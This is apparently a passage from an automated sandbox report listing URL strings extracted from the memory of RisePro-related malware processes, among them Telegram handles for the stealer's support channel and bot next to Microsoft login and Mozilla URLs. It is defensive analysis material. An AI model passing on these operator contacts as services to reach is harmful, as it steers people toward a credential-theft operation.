                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269246589.000001EFCDC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                                Source: svchost.exe, 0000001E.00000003.2356389509.000001EFCE56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                                Source: svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfe
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE52C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                                Source: svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3308028724.000001EFCDD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2477482746.000001EFCDD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                                Source: svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806013
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                                Source: svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3308028724.000001EFCDD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2477482746.000001EFCDD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3308028724.000001EFCDD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2477482746.000001EFCDD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355752534.000001EFCE557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269246589.000001EFCDC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE52C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354695879.000001EFCE55A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp8
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                                Source: svchost.exe, 0000001E.00000002.3325008437.000001EFCEC13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                                Source: svchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                                Source: svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                                Source: svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                                Source: svchost.exe, 0000001E.00000002.3269246589.000001EFCDC2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/li
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                                Source: svchost.exe, 0000001E.00000002.3308028724.000001EFCDCE1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3325406363.000001EFCEC71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                                Source: svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf(
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
                                Source: svchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                                Source: svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                                Source: svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfL
                                Source: svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                                Source: svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                                Source: svchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srft
                                Source: svchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                                Source: svchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfr
                                Source: svchost.exe, 0000001E.00000002.3290683644.000001EFCDC9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pcss.dll
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354397715.000001EFCE52C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                                Source: MPGPH131.exe, 00000014.00000003.2351242676.00000000079D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                Source: MPGPH131.exe, 00000014.00000003.2351242676.00000000079D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.(
                                Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007BDD000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2511321549.000000000149E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.000000000169D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2363329164.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2539684694.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2362400081.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2539684694.00000000079D0000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2361500183.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001F.00000002.2450136740.000000000146E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORT
                                Source: MPGPH131.exe, 00000013.00000002.2500776200.000000000169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORTqUTv
                                Source: MPGPH131.exe, 00000014.00000003.2363329164.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2539684694.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2362400081.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2361500183.0000000007A11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORTv=
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot1.132
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot:
                                Source: MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botH
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botftW
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botisepro_bot
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botisepro_botU
                                Source: MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botn
                                Source: MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.0000000001440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botrisepro
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botriseproU
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.tIpo
Source: 2531414c80.exe, 00000008.00000003.2242125637.0000000007CFA000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2239114261.0000000007C55000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2249859344.0000000007C5F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304428591.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306217637.0000000007F21000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2347869504.0000000008820000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2298437366.0000000007A30000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2293320807.0000000007AAA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2344760612.0000000007A30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: 2531414c80.exe, 00000008.00000003.2242125637.0000000007CFA000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2239114261.0000000007C55000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2249859344.0000000007C5F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304428591.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306217637.0000000007F21000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2347869504.0000000008820000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2298437366.0000000007A30000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2293320807.0000000007AAA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2344760612.0000000007A30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 2531414c80.exe | String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: MPGPH131.exe, 00000014.00000003.2351242676.00000000079D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: MPGPH131.exe, 00000014.00000003.2351242676.00000000079D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2300158551.0000000007E49000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2324847238.0000000007E46000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2506556496.0000000007E40000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306724573.0000000007E46000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2301470542.0000000007E49000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2299159768.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304704157.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2300712531.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2322536020.0000000007E46000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2305456630.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/FX
Source: 2531414c80.exe, 00000008.00000003.2246698815.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2263027375.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2250377410.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242976435.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2237987811.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2250022722.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2236789799.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2262315779.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2252002938.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2248838364.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242573192.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2251127325.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2516925001.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2259361642.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2253196095.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 